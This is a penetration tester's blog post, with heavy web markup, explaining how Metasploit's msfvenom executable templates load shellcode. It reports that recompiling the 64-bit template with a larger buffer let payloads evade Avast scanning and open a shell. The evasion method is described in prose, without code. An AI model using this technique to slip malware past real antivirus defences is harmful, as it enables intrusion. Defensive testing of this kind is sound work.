When performing a penetration of test of organizations with Windows desktops, many testers will now resort to using tools like Veil’s Powershell Empire in order to inject shellcode directly into memory. Without doubt, this is a fantastic technique as it avoids writing to disk and running headlong into a direct hit by most endpoint protection solutions.</div>
<div id="innerContainer_diky1gjp" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 10px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<div class="s14" data-content-padding-horizontal="0" data-content-padding-vertical="0" data-exact-height="185.95161290322582" data-react-checksum="1460677593" data-reactid=".e" id="innercomp_diky1gjp" style="background: transparent; border: 0px; clear: both; display: block; height: 186px; margin: 10px auto; outline: 0px; padding: 0px; position: static; vertical-align: baseline; width: 453px;" title="">
<div class="s14link" data-reactid=".e.0" id="innercomp_diky1gjplink" style="background: transparent; border: 0px; display: block; height: 186px; margin: 0px; outline: 0px; overflow: hidden; padding: 0px; vertical-align: baseline; width: 453px;">
<div class="s14img" data-reactid=".e.0.0" data-state="loaded" id="innercomp_diky1gjpimg" style="background: transparent; border: 0px; height: 186px; margin: 0px; outline: 0px; padding: 0px; position: relative; vertical-align: baseline; width: 453px;">
<img class="s14imgimage" data-reactid=".e.0.0.0" id="innercomp_diky1gjpimgimage" src="http://static.wixstatic.com/media/75fce7_22834eb0b7c845cfbea5f9a27d1430bb.png_srb_p_445_183_75_22_0.50_1.20_0.00_png_srb" style="-webkit-user-select: none; background: transparent; border: 0px; box-shadow: rgb(0, 0, 0) 0px 0px 0px; height: 186px; margin: 0px; object-fit: contain; outline: 0px; padding: 0px; position: static; vertical-align: baseline; width: 453px;" /></div>
</div>
</div>
</div>
<div class="font_9" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 12px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<br /></div>
<div class="font_7" style="background: transparent none repeat scroll 0% 0%; border: 0px none; color: #1c1c1c; font-family: "open sans",sans-serif; font-size: 14px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; outline: 0px none; padding: 0px; text-align: center; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
xkcd: The malware aquarium</div>
<div class="font_8" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 13px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<br /></div>
<div class="font_8" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 13px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
It is often the the case that we want to perform some more thorough testing by using actual malware executables, and perhaps different command and control techniques during our test. We want to vary our techniques in order to find out where the clipping threshold of defense technologies is set and be able to comprehensively report back on what techniques were effective on a system versus what techniques were not. In most environments, the most commonly deployed endpoint protection technology is an Antivirus engine. </div>
<div class="font_8" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 13px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<br /></div>
<div class="font_8" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 13px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
Antivirus has become very effective at detecting off-the-shelf 32-bit malware executables from the Metasploit framework but tends to be lacking in the 64-bit arena. Additionally, we find that network resident defenses are well-tuned to 32-bit second stage payloads from Metasploit but less capable of seeing a 64-bit second stage payload. In my experience, the AV engines are not exclusively looking at the shellcode but also matching on the assembly code that constitutes the stub loader for Metasploit executables generated by the msfvenom command.</div>
<div class="font_8" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 13px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<br /></div>
<div class="font_8" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 13px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
When Metasploit payloads are generated they use a standard template executable in both the 32-bit and 64-bit cases. The standard templates are in the form of precompiled executables in the framework’s data directory. In addition to the templates, the Metasploit project provides a source code directory in the framework.</div>
<div class="font_8" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 13px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<br /></div>
<div class="font_8" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 13px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
Focusing specifically on Windows, we can find both the 32-bit template source in C and the 64-bit template source in assembly, both of which are in the “/usr/share/metasploit-framework/data/templates/src/pe/exe” directory on a KALI distribution.</div>
<div class="font_8" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 13px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<br /></div>
<div class="font_8" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 13px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
In both the 32 and 64-bit cases, the template source has a very similar function. It allocates a buffer of 4096 bytes in memory and puts the string “PAYLOAD:” at the beginning of this buffer. The string “PAYLOAD:” is placed into the buffer as a constant that indicates a starting place for “msfvenom” to use when creating a new payload executable.</div>
<div class="font_8" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 13px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<br /></div>
<div class="font_8" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 13px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
That starting place is an address in memory which msfvenom knows can be used to copy shellcode into. The size of the available buffer for shellcode is the allocated buffer size in the template EXE minus eight (the length of the string “PAYLOAD:”). Msfvenom will take the chosen payload, encode it with the appropriate encoder (if specified), and prepend no-operation (NOP) sled bytes if also chosen.</div>
<div class="font_8" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 13px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<br /></div>
<div class="font_8" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 13px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
The final executable in the 32-bit case has been compiled from C source code. In the C source code, the shellcode is called by casting the payload buffer to a pointer to a function (which has no function parameters).</div>
<div class="font_8" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 13px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<br /></div>
<div class="font_8" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 13px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
The final executable in the 64-bit case has been compiled from assembly code. The assembly code function allocates an executable buffer of memory, copies the shellcode into that memory, and executes it using a CALL instruction. This is a very similar technique used by many different tools, including the awesome Powershell toys we all use.</div>
<div id="innerContainer_txtMediaw4h" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 10px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<div class="s14" data-content-padding-horizontal="0" data-content-padding-vertical="0" data-exact-height="228.62903225806448" data-react-checksum="452734963" data-reactid=".f" id="innercomp_txtMediaw4h" style="background: transparent; border: 0px; clear: both; display: block; height: 229px; margin: 10px auto; outline: 0px; padding: 0px; position: static; vertical-align: baseline; width: 350px;" title="">
<div class="s14link" data-reactid=".f.0" id="innercomp_txtMediaw4hlink" style="background: transparent; border: 0px; display: block; height: 229px; margin: 0px; outline: 0px; overflow: hidden; padding: 0px; vertical-align: baseline; width: 350px;">
<div class="s14img" data-reactid=".f.0.0" data-state="loaded" id="innercomp_txtMediaw4himg" style="background: transparent; border: 0px; height: 229px; margin: 0px; outline: 0px; padding: 0px; position: relative; vertical-align: baseline; width: 350px;">
<img class="s14imgimage" data-reactid=".f.0.0.0" id="innercomp_txtMediaw4himgimage" src="http://static.wixstatic.com/media/75fce7_174108d3c80c492a8eafb216b4911f6a.png_srb_p_344_225_75_22_0.50_1.20_0.00_png_srb" style="-webkit-user-select: none; background: transparent; border: 0px; box-shadow: rgb(0, 0, 0) 0px 0px 0px; height: 229px; margin: 0px; object-fit: contain; outline: 0px; padding: 0px; position: static; vertical-align: baseline; width: 350px;" /></div>
</div>
</div>
</div>
<div class="font_8" style="background: transparent none repeat scroll 0% 0%; border: 0px none; color: #1c1c1c; font-family: "open sans",sans-serif; font-size: 13px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; outline: 0px none; padding: 0px; text-align: center; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<span style="background: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span>32-bit source code for EXE template</div>
<div class="font_8" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 13px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<br /></div>
<div id="innerContainer_txtMedia1h9h" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 10px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<div class="s14" data-content-padding-horizontal="0" data-content-padding-vertical="0" data-exact-height="413.6470361619067" data-react-checksum="733622415" data-reactid=".g" id="innercomp_txtMedia1h9h" style="background: transparent; border: 0px; clear: both; display: block; height: 414px; margin: 10px auto; outline: 0px; padding: 0px; position: static; vertical-align: baseline; width: 629px;" title="">
<div class="s14link" data-reactid=".g.0" id="innercomp_txtMedia1h9hlink" style="background: transparent; border: 0px; display: block; height: 414px; margin: 0px; outline: 0px; overflow: hidden; padding: 0px; vertical-align: baseline; width: 629px;">
<div class="s14img" data-reactid=".g.0.0" data-state="loaded" id="innercomp_txtMedia1h9himg" style="background: transparent; border: 0px; height: 414px; margin: 0px; outline: 0px; padding: 0px; position: relative; vertical-align: baseline; width: 629px;">
<img class="s14imgimage" data-reactid=".g.0.0.0" id="innercomp_txtMedia1h9himgimage" src="http://static.wixstatic.com/media/75fce7_3137854e8d58477c944dfa8bb3f2a5c4.png_srb_p_628_413_75_22_0.50_1.20_0.00_png_srb" style="-webkit-user-select: none; background: transparent; border: 0px; box-shadow: rgb(0, 0, 0) 0px 0px 0px; height: 414px; margin: 0px; object-fit: contain; outline: 0px; padding: 0px; position: static; vertical-align: baseline; width: 629px;" /></div>
</div>
</div>
</div>
<div class="font_7" style="background: transparent none repeat scroll 0% 0%; border: 0px none; color: #1c1c1c; font-family: "open sans",sans-serif; font-size: 14px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; outline: 0px none; padding: 0px; text-align: center; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<span style="background: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span>64-bit assembly source code for EXE template</div>
<div class="font_8" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 13px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<br /></div>
<div class="font_8" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 13px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
Armed with this knowledge, I decided to see how one single AV engine (Avast) reacted when I simply took the 64-bit executable template and copied it to a Windows system. Note that I did not even put any shellcode payload into the EXE but only took the template itself.</div>
<div class="font_8" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 13px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<br /></div>
<div class="font_8" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 13px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
It was not really surprising that Avast immediately triggered an alert. Let's face it, matching on the assembly opcodes for the template is a pretty easy way of triggering an alert without having to actually examine the shellcode payload.</div>
<div class="font_8" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 13px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<br /></div>
<div id="innerContainer_txtMediaxfp" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 10px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<div class="s14" data-content-padding-horizontal="0" data-content-padding-vertical="0" data-exact-height="255.04838709677418" data-react-checksum="-970575564" data-reactid=".h" id="innercomp_txtMediaxfp" style="background: transparent; border: 0px; clear: both; display: block; height: 256px; margin: 10px auto; outline: 0px; padding: 0px; position: static; vertical-align: baseline; width: 350px;" title="">
<div class="s14link" data-reactid=".h.0" id="innercomp_txtMediaxfplink" style="background: transparent; border: 0px; display: block; height: 256px; margin: 0px; outline: 0px; overflow: hidden; padding: 0px; vertical-align: baseline; width: 350px;">
<div class="s14img" data-reactid=".h.0.0" data-state="loaded" id="innercomp_txtMediaxfpimg" style="background: transparent; border: 0px; height: 256px; margin: 0px; outline: 0px; padding: 0px; position: relative; vertical-align: baseline; width: 350px;">
<img class="s14imgimage" data-reactid=".h.0.0.0" id="innercomp_txtMediaxfpimgimage" src="http://static.wixstatic.com/media/75fce7_17a8828c21f94f0891dc290fb96aaa6b.png_srb_p_344_251_75_22_0.50_1.20_0.00_png_srb" style="-webkit-user-select: none; background: transparent; border: 0px; box-shadow: rgb(0, 0, 0) 0px 0px 0px; height: 256px; margin: 0px; object-fit: contain; outline: 0px; padding: 0px; position: static; vertical-align: baseline; width: 350px;" /></div>
</div>
</div>
</div>
<div class="font_8" style="background: transparent none repeat scroll 0% 0%; border: 0px none; color: #1c1c1c; font-family: "open sans",sans-serif; font-size: 13px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; outline: 0px none; padding: 0px; text-align: center; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<span style="background: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span>Avast tells me this is bad!</div>
<div class="font_8" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 13px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<br /></div>
<div class="font_8" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 13px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
Staying focused on the 64-bit case, there is absolutely no reason why I cannot recompile this assembly code and modify it as much or as little as I want to. We only need to make sure that, at some point, it calls the two required bits of code to copy the payload into an executable memory segment we allocated and then executes it.</div>
<div class="font_8" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 13px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<br /></div>
<div class="font_8" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 13px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<span style="background: transparent; border: 0px; font-weight: bold; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Case 1:<span class="Apple-converted-space"> </span></span> For my first level of fun, I simply recompiled the same source assembly code. Not surprisingly, Avast flagged this.</div>
<div class="font_8" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 13px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<br /></div>
<div class="font_8" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 13px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<span style="background: transparent; border: 0px; font-weight: bold; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Case 2:</span><span class="Apple-converted-space"> </span>I changed the buffer length to 8192 bytes, and recompiled. Nothing other than the buffer length was changed. Avast completely failed this test by not flagging a single alert. How do I know? Well I compiled it on the system that Avast was also running. Note that the instructions for compiling the assembly code are helpfully listed in the commands of the source code.</div>
<div class="font_8" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 13px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<br /></div>
<div id="innerContainer_txtMedia11pu" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 10px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<div class="s14" data-content-padding-horizontal="0" data-content-padding-vertical="0" data-exact-height="101.61290322580646" data-react-checksum="500445445" data-reactid=".i" id="innercomp_txtMedia11pu" style="background: transparent; border: 0px; clear: both; display: block; height: 102px; margin: 10px auto; outline: 0px; padding: 0px; position: static; vertical-align: baseline; width: 238px;" title="">
<div class="s14link" data-reactid=".i.0" id="innercomp_txtMedia11pulink" style="background: transparent; border: 0px; display: block; height: 102px; margin: 0px; outline: 0px; overflow: hidden; padding: 0px; vertical-align: baseline; width: 238px;">
<div class="s14img" data-reactid=".i.0.0" data-state="loaded" id="innercomp_txtMedia11puimg" style="background: transparent; border: 0px; height: 102px; margin: 0px; outline: 0px; padding: 0px; position: relative; vertical-align: baseline; width: 238px;">
<img class="s14imgimage" data-reactid=".i.0.0.0" id="innercomp_txtMedia11puimgimage" src="http://static.wixstatic.com/media/75fce7_57c1c8b6b3c64fcaa636cc73a39140f3.png_srb_p_234_100_75_22_0.50_1.20_0.00_png_srb" style="-webkit-user-select: none; background: transparent; border: 0px; box-shadow: rgb(0, 0, 0) 0px 0px 0px; height: 102px; margin: 0px; object-fit: contain; outline: 0px; padding: 0px; position: static; vertical-align: baseline; width: 238px;" /></div>
</div>
</div>
</div>
<div class="font_7" style="background: transparent none repeat scroll 0% 0%; border: 0px none; color: #1c1c1c; font-family: "open sans",sans-serif; font-size: 14px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; outline: 0px none; padding: 0px; text-align: center; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
Last section of x64 assembly listing</div>
<div class="font_8" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 13px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<br /></div>
<div class="font_8" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 13px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<span style="background: transparent; border: 0px; font-weight: bold; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Case 3:</span><span class="Apple-converted-space"> </span>I modified all of the values in the assembly code to 8192, then took my newly generated executable template and created two different payloads with it. One of the payloads used the 64-bit XOR encoding on the shellcode, while the other used no encoding at all.</div>
<div class="font_9" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 12px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<br /></div>
<div class="font_9" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 12px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
I then copied the payload files to my Windows 7 machine running Avast. I forced Avast to scan them, and they passed with flying colors! Then I executed them and shell was mine.</div>
<div class="font_9" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 12px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<br /></div>
<div class="font_9" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 12px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
With case 3, I was particularly amused at Avast’s DEEP SCAN, which seemed to indicate that it was looking really hard at what was going on! But then, it told me that all was fine and the malware was happily executed.</div>
